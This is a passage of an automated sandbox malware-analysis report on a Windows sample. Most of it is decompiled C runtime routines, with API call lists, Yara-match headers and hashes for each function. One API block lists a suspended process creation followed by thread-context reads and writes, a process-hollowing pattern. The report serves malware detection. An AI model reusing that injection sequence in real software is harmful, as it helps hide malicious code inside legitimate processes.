                                        							0xefd20[_t149] = _t138;
                                        							 *0xf1b28 =  *0xf1b28 + _t141;
                                        							__eflags =  *0xf1b28;
                                        							while(1) {
                                        								__eflags = _t138 - 0x800 + 0xefd20[_t149];
                                        								if(_t138 >= 0x800 + 0xefd20[_t149]) {
                                        									break;
                                        								}
                                        								 *((short*)(_t138 + 4)) = 0xa00;
                                        								 *_t138 =  *_t138 | 0xffffffff;
                                        								 *((intOrPtr*)(_t138 + 8)) = 0;
                                        								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
                                        								 *((short*)(_t138 + 0x25)) = 0xa0a;
                                        								 *((intOrPtr*)(_t138 + 0x38)) = 0;
                                        								 *((char*)(_t138 + 0x34)) = 0;
                                        								_t138 = _t138 + 0x40;
                                        								 *(_t155 - 0x24) = _t138;
                                        							}
                                        							_t149 = _t149 + 1;
                                        							 *(_t155 - 0x30) = _t149;
                                        							_t135 =  *(_t155 - 0x1c);
                                        							continue;
                                        						}
                                        						_t135 =  *0xf1b28; // 0x20
                                        						 *(_t155 - 0x1c) = _t135;
                                        						break;
                                        					}
                                        					_t143 = 0;
                                        					 *(_t155 - 0x2c) = 0;
                                        					_t129 = 0xfffffffe;
                                        					_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                        					_t139 =  *(_t155 - 0x20);
                                        					while(1) {
                                        						__eflags = _t143 - _t135;
                                        						if(_t143 >= _t135) {
                                        							goto L28;
                                        						}
                                        						_t150 =  *_t139;
                                        						__eflags = _t150 - 0xffffffff;
                                        						if(_t150 == 0xffffffff) {
                                        							L22:
                                        							_t143 = _t143 + 1;
                                        							 *(_t155 - 0x2c) = _t143;
                                        							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                        							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                        							_t139 =  &(_t139[1]);
                                        							 *(_t155 - 0x20) = _t139;
                                        							continue;
                                        						}
                                        						__eflags = _t150 - _t129;
                                        						if(_t150 == _t129) {
                                        							goto L22;
                                        						}
                                        						_t111 =  *_t109;
                                        						__eflags = _t111 & 0x00000001;
                                        						if((_t111 & 0x00000001) == 0) {
                                        							goto L22;
                                        						}
                                        						__eflags = _t111 & 0x00000008;
                                        						if((_t111 & 0x00000008) != 0) {
                                        							L20:
                                        							_t154 = ((_t143 & 0x0000001f) << 6) + 0xefd20[_t143 >> 5];
                                        							 *(_t155 - 0x24) = _t154;
                                        							 *_t154 =  *_t139;
                                        							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                        							_t37 = _t154 + 0xc; // 0xd
                                        							E00092D36(_t37, 0xfa0, 0);
                                        							_t156 = _t156 + 0xc;
                                        							_t38 = _t154 + 8;
                                        							 *_t38 =  *(_t154 + 8) + 1;
                                        							__eflags =  *_t38;
                                        							_t139 =  *(_t155 - 0x20);
                                        							L21:
                                        							_t135 =  *(_t155 - 0x1c);
                                        							goto L22;
                                        						}
                                        						_t119 = GetFileType(_t150);
                                        						_t139 =  *(_t155 - 0x20);
                                        						__eflags = _t119;
                                        						if(_t119 == 0) {
                                        							goto L21;
                                        						}
                                        						goto L20;
                                        					}
                                        					goto L28;
                                        				}
                                        				_t86 = E00094E90(_t155, 0xaece0, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
                                        				goto L49;
                                        			}


                                        APIs
                                        • __lock.LIBCMT ref: 00091DDD
                                          • Part of subcall function 00093117: __mtinitlocknum.LIBCMT ref: 00093129
                                          • Part of subcall function 00093117: __amsg_exit.LIBCMT ref: 00093135
                                          • Part of subcall function 00093117: EnterCriticalSection.KERNEL32(00000000,?,000916CE,0000000D), ref: 00093142
                                        • __calloc_crt.LIBCMT ref: 00091DEE
                                          • Part of subcall function 000932EE: __calloc_impl.LIBCMT ref: 000932FD
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00091E09
                                        • GetStartupInfoW.KERNEL32(?,000ACD50,00000064,00091146,000ACCC0,00000014), ref: 00091E62
                                        • __calloc_crt.LIBCMT ref: 00091EAD
                                        • GetFileType.KERNEL32(00000001), ref: 00091EF6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__amsg_exit__calloc_impl__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 2621518576-0
                                        • Opcode ID: daff4c2a0ecc77722230a715ce02e52f35dab8d150c143d0d69f8b882fc5d853
                                        • Instruction ID: f7c14dc26cf176d419ad1a3d534759837349f44964dcf94711b9ad3e31d60c39
                                        • Opcode Fuzzy Hash: daff4c2a0ecc77722230a715ce02e52f35dab8d150c143d0d69f8b882fc5d853
                                        • Instruction Fuzzy Hash: B281B471A0424A9FDF24CF64CC515EDBBF0BF49324B24426DD4A6AB3D1D7399802EB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 000AF73D
                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,000B0190,81AF6D4E,000AFCD3), ref: 000AF767
                                        • ReadFile.KERNELBASE(00000000,00000000,000AFCD3,?,00000000,?,?,?,?,?,?,?,?,?,000B0190,81AF6D4E), ref: 000AF77E
                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,000B0190,81AF6D4E,000AFCD3), ref: 000AF7A0
                                        • FindCloseChangeNotification.KERNELBASE(81AF6D4E,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,000B0190), ref: 000AF812
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000000,?), ref: 000AF81D
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,000B0190,81AF6D4E,000AFCD3,00000000), ref: 000AF868
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                        • String ID:
                                        • API String ID: 656311269-0
                                        • Opcode ID: 97b910f21815d8457922ed8ca2e505dd5b440e900b165ea24fa558e1bdbe992b
                                        • Instruction ID: e641c2de3f9ef794163a08bed9b66d08d0db483cc2c341375b1c7b05b7d19205
                                        • Opcode Fuzzy Hash: 97b910f21815d8457922ed8ca2e505dd5b440e900b165ea24fa558e1bdbe992b
                                        • Instruction Fuzzy Hash: 4F517A71E0021AABDB209BF4CC85FEEBBB8EF19714F104529F511FB281EB7499018B64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,08000004,00000000,00000000,?,?), ref: 000AF206
                                        • GetThreadContext.KERNELBASE(?,?), ref: 000AF225
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 000AF245
                                        • SetThreadContext.KERNELBASE(?,00010007,?,?,?,00000004,00000000,?,?,?,?,000000FF,?,00000000,00000000,00000000), ref: 000AF402
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: ContextProcessThread$CreateMemoryRead
                                        • String ID:
                                        • API String ID: 3262821800-0
                                        • Opcode ID: d953efe4af85d319bc9abbc82787135bbc7d7a650ddf50ad8815eeeae843a890
                                        • Instruction ID: 817d9d62dc8787a98ce68dc724886ca217155001a6c27fa33192b4ab3aabf4b1
                                        • Opcode Fuzzy Hash: d953efe4af85d319bc9abbc82787135bbc7d7a650ddf50ad8815eeeae843a890
                                        • Instruction Fuzzy Hash: B1C15871A0020AABEF219FE4CD45FFEBBB8BF09304F144179E505B6191D774AA85CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ExitProcess.KERNEL32(00000000), ref: 000B0B52
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: 5113b86b37df4b07ae03213fe012da79$D
                                        • API String ID: 621844428-89965315
                                        • Opcode ID: b68e6e79c134320777226aec7a8f657a50630cd056bbb628e4f733a692dc0c4b
                                        • Instruction ID: bea06c117843fc2200090a3d433b982027d17c7727e96ae7fc607ddbf07b0209
                                        • Opcode Fuzzy Hash: b68e6e79c134320777226aec7a8f657a50630cd056bbb628e4f733a692dc0c4b
                                        • Instruction Fuzzy Hash: F3918E30D1438CEEEF12CBE8D845BEEBBB5AF14704F10409AE548BA292D7B50B44DB25
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        C-Code - Quality: 100%
                                        			E0009E84E(short _a4, intOrPtr _a8) {
                                        				short _t13;
                                        				short _t28;
                                        
                                        				_t28 = _a4;
                                        				if(_t28 != 0 &&  *_t28 != 0 && E0009DB06(_t28, ?str?) != 0) {
                                        					if(E0009DB06(_t28, ?str?) != 0) {
                                        						return E0009FA26(_t28);
                                        					}
                                        					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
                                        						L9:
                                        						return 0;
                                        					}
                                        					return _a4;
                                        				}
                                        				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
                                        					goto L9;
                                        				}
                                        				_t13 = _a4;
                                        				if(_t13 == 0) {
                                        					return GetACP();
                                        				}
                                        				return _t13;
                                        			}


                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0009EB14,?,00000000), ref: 0009E892
                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0009EB14,?,00000000), ref: 0009E8BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E000930E7(struct _EXCEPTION_POINTERS* _a4) {
                                        
                                        				SetUnhandledExceptionFilter(0);
                                        				return UnhandledExceptionFilter(_a4);
                                        			}




                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0009407B,?,?,?,00000000), ref: 000930EC
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 000930F5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: (
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: (
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E0009771D(signed int _a4, intOrPtr _a8, intOrPtr _a12) {
                                        				signed int _t5;
                                        				signed int _t6;
                                        				int _t8;
                                        
                                        				_t5 =  *0xf1af8; // 0xb13f8fed
                                        				_t6 = _t5 ^  *0xaece0;
                                        				if(_t6 == 0) {
                                        					 *0xf071c = _a4;
                                        					_t8 = EnumSystemLocalesW(E00097709, 1);
                                        					 *0xf071c =  *0xf071c & 0x00000000;
                                        					return _t8;
                                        				} else {
                                        					return  *_t6(_a4, _a8, _a12, 0);
                                        				}
                                        			}







                                        APIs
                                        • EnumSystemLocalesW.KERNEL32(00097709,00000001,?,0009DCD2,0009DD70,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0009774B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: EnumLocalesSystem
                                        • String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,00094744,?,?,?,00000002), ref: 000977CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E000930B6(_Unknown_base(*)()* _a4) {
                                        
                                        				return SetUnhandledExceptionFilter(_a4);
                                        			}




                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(?,?,000912D0,00091285), ref: 000930BC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 3r+
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00091DB2() {
                                        				void* _t3;
                                        
                                        				_t3 = GetProcessHeap();
                                        				 *0xefd1c = _t3;
                                        				return 0 | _t3 != 0x00000000;
                                        			}





                                        APIs
                                        • GetProcessHeap.KERNEL32(0009111B,000ACCC0,00000014), ref: 00091DB2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0009B933(void* __edx, void* __esi) {
                                        				signed int _t192;
                                        				signed char _t193;
                                        				signed char _t194;
                                        				signed char _t195;
                                        				signed char _t196;
                                        				signed char _t198;
                                        				signed int _t241;
                                        				void* _t287;
                                        				void* _t292;
                                        				void* _t294;
                                        				void* _t296;
                                        				void* _t298;
                                        				void* _t300;
                                        				void* _t302;
                                        				void* _t304;
                                        				void* _t306;
                                        				void* _t308;
                                        				void* _t310;
                                        				void* _t312;
                                        				void* _t314;
                                        				void* _t316;
                                        				void* _t318;
                                        				void* _t320;
                                        				void* _t322;
                                        				void* _t324;
                                        				void* _t326;
                                        				void* _t327;
                                        
                                        				_t327 = __esi;
                                        				_t287 = __edx;
                                        				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
                                        					_t241 = 0;
                                        					L15:
                                        					if(_t241 != 0) {
                                        						goto L2;
                                        					}
                                        					_t193 =  *(_t327 - 0x1a);
                                        					if(_t193 ==  *(_t287 - 0x1a)) {
                                        						_t241 = 0;
                                        						L26:
                                        						if(_t241 != 0) {
                                        							goto L2;
                                        						}
                                        						_t194 =  *(_t327 - 0x16);
                                        						if(_t194 ==  *(_t287 - 0x16)) {
                                        							_t241 = 0;
                                        							L37:
                                        							if(_t241 != 0) {
                                        								goto L2;
                                        							}
                                        							_t195 =  *(_t327 - 0x12);
                                        							if(_t195 ==  *(_t287 - 0x12)) {
                                        								_t241 = 0;
                                        								L48:
                                        								if(_t241 != 0) {
                                        									goto L2;
                                        								}
                                        								_t196 =  *(_t327 - 0xe);
                                        								if(_t196 ==  *(_t287 - 0xe)) {
                                        									_t241 = 0;
                                        									L59:
                                        									if(_t241 != 0) {
                                        										goto L2;
                                        									}
                                        									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
                                        										_t241 = 0;
                                        										L70:
                                        										if(_t241 != 0) {
                                        											goto L2;
                                        										}
                                        										_t198 =  *(_t327 - 6);
                                        										if(_t198 ==  *(_t287 - 6)) {
                                        											_t241 = 0;
                                        											L81:
                                        											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
                                        											}
                                        											goto L2;
                                        										}
                                        										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
                                        										if(_t292 == 0) {
                                        											L74:
                                        											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
                                        											if(_t294 == 0) {
                                        												L76:
                                        												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
                                        												if(_t296 == 0) {
                                        													L78:
                                        													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
                                        													if(_t241 != 0) {
                                        														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                        													}
                                        													goto L81;
                                        												}
                                        												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
                                        												if(_t241 != 0) {
                                        													goto L2;
                                        												}
                                        												goto L78;
                                        											}
                                        											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
                                        											if(_t241 != 0) {
                                        												goto L2;
                                        											}
                                        											goto L76;
                                        										}
                                        										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
                                        										if(_t241 != 0) {
                                        											goto L2;
                                        										}
                                        										goto L74;
                                        									}
                                        									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
                                        									if(_t298 == 0) {
                                        										L63:
                                        										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
                                        										if(_t300 == 0) {
                                        											L65:
                                        											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
                                        											if(_t302 == 0) {
                                        												L67:
                                        												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
                                        												if(_t241 != 0) {
                                        													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                        												}
                                        												goto L70;
                                        											}
                                        											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
                                        											if(_t241 != 0) {
                                        												goto L2;
                                        											}
                                        											goto L67;
                                        										}
                                        										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
                                        										if(_t241 != 0) {
                                        											goto L2;
                                        										}
                                        										goto L65;
                                        									}
                                        									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
                                        									if(_t241 != 0) {
                                        										goto L2;
                                        									}
                                        									goto L63;
                                        								}
                                        								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
                                        								if(_t304 == 0) {
                                        									L52:
                                        									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
                                        									if(_t306 == 0) {
                                        										L54:
                                        										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
                                        										if(_t308 == 0) {
                                        											L56:
                                        											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
                                        											if(_t241 != 0) {
                                        												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                        											}
                                        											goto L59;
                                        										}
                                        										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
                                        										if(_t241 != 0) {
                                        											goto L2;
                                        										}
                                        										goto L56;
                                        									}
                                        									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
                                        									if(_t241 != 0) {
                                        										goto L2;
                                        									}
                                        									goto L54;
                                        								}
                                        								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
                                        								if(_t241 != 0) {
                                        									goto L2;
                                        								}
                                        								goto L52;
                                        							}
                                        							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
                                        							if(_t310 == 0) {
                                        								L41:
                                        								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
                                        								if(_t312 == 0) {
                                        									L43:
                                        									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
                                        									if(_t314 == 0) {
                                        										L45:
                                        										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
                                        										if(_t241 != 0) {
                                        											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                        										}
                                        										goto L48;
                                        									}
                                        									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
                                        									if(_t241 != 0) {
                                        										goto L2;
                                        									}
                                        									goto L45;
                                        								}
                                        								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
                                        								if(_t241 != 0) {
                                        									goto L2;
                                        								}
                                        								goto L43;
                                        							}
                                        							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
                                        							if(_t241 != 0) {
                                        								goto L2;
                                        							}
                                        							goto L41;
                                        						}
                                        						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
                                        						if(_t316 == 0) {
                                        							L30:
                                        							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
                                        							if(_t318 == 0) {
                                        								L32:
                                        								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
                                        								if(_t320 == 0) {
                                        									L34:
                                        									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
                                        									if(_t241 != 0) {
                                        										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                        									}
                                        									goto L37;
                                        								}
                                        								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
                                        								if(_t241 != 0) {
                                        									goto L2;
                                        								}
                                        								goto L34;
                                        							}
                                        							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
                                        							if(_t241 != 0) {
                                        								goto L2;
                                        							}
                                        							goto L32;
                                        						}
                                        						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
                                        						if(_t241 != 0) {
                                        							goto L2;
                                        						}
                                        						goto L30;
                                        					}
                                        					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
                                        					if(_t322 == 0) {
                                        						L19:
                                        						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
                                        						if(_t324 == 0) {
                                        							L21:
                                        							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
                                        							if(_t326 == 0) {
                                        								L23:
                                        								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
                                        								if(_t241 != 0) {
                                        									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
                                        								}
                                        								goto L26;
                                        							}
                                        							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
                                        							if(_t241 != 0) {
                                        								goto L2;
                                        							}
                                        							goto L23;
                                        						}
                                        						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
                                        						if(_t241 != 0) {
                                        							goto L2;
                                        						}
                                        						goto L21;
                                        					}
                                        					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
                                        					if(_t241 != 0) {
                                        						goto L2;
                                        					}
                                        					goto L19;
                                        				} else {
                                        					__edi = __al & 0x000000ff;
                                        					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                        					if(__edi == 0) {
                                        						L8:
                                        						__edi =  *(__esi - 0x1d) & 0x000000ff;
                                        						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                        						if(__edi == 0) {
                                        							L10:
                                        							__edi =  *(__esi - 0x1c) & 0x000000ff;
                                        							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                        							if(__edi == 0) {
                                        								L12:
                                        								__ecx =  *(__esi - 0x1b) & 0x000000ff;
                                        								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                        								if(__ecx != 0) {
                                        									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                        								}
                                        								goto L15;
                                        							}
                                        							0 = 0 | __edi > 0x00000000;
                                        							__ecx = (__edi > 0) * 2 != 1;
                                        							if((__edi > 0) * 2 != 1) {
                                        								L2:
                                        								_t192 = _t241;
                                        								return _t192;
                                        							}
                                        							goto L12;
                                        						}
                                        						0 = 0 | __edi > 0x00000000;
                                        						__ecx = (__edi > 0) * 2 != 1;
                                        						if((__edi > 0) * 2 != 1) {
                                        							goto L2;
                                        						}
                                        						goto L10;
                                        					}
                                        					0 = 0 | __edi > 0x00000000;
                                        					__ecx = (__edi > 0) * 2 != 1;
                                        					if((__edi > 0) * 2 != 1) {
                                        						goto L2;
                                        					}
                                        					goto L8;
                                        				}
                                        			}































                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                        • Instruction ID: c6339f40e066c5c3f1d5830d9b412b05a62eef217d14b8f17a4cbd8e6802bb9e
                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                        • Instruction Fuzzy Hash: ADC14F722051930ADFAD463EA67453EBAE15BA27B131A075DD8B2CF1D6FF20C524F620
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0009BD68(void* __edx, void* __esi) {
                                        				signed int _t197;
                                        				signed char _t198;
                                        				signed char _t199;
                                        				signed char _t200;
                                        				signed char _t202;
                                        				signed char _t203;
                                        				signed int _t246;
                                        				void* _t294;
                                        				void* _t297;
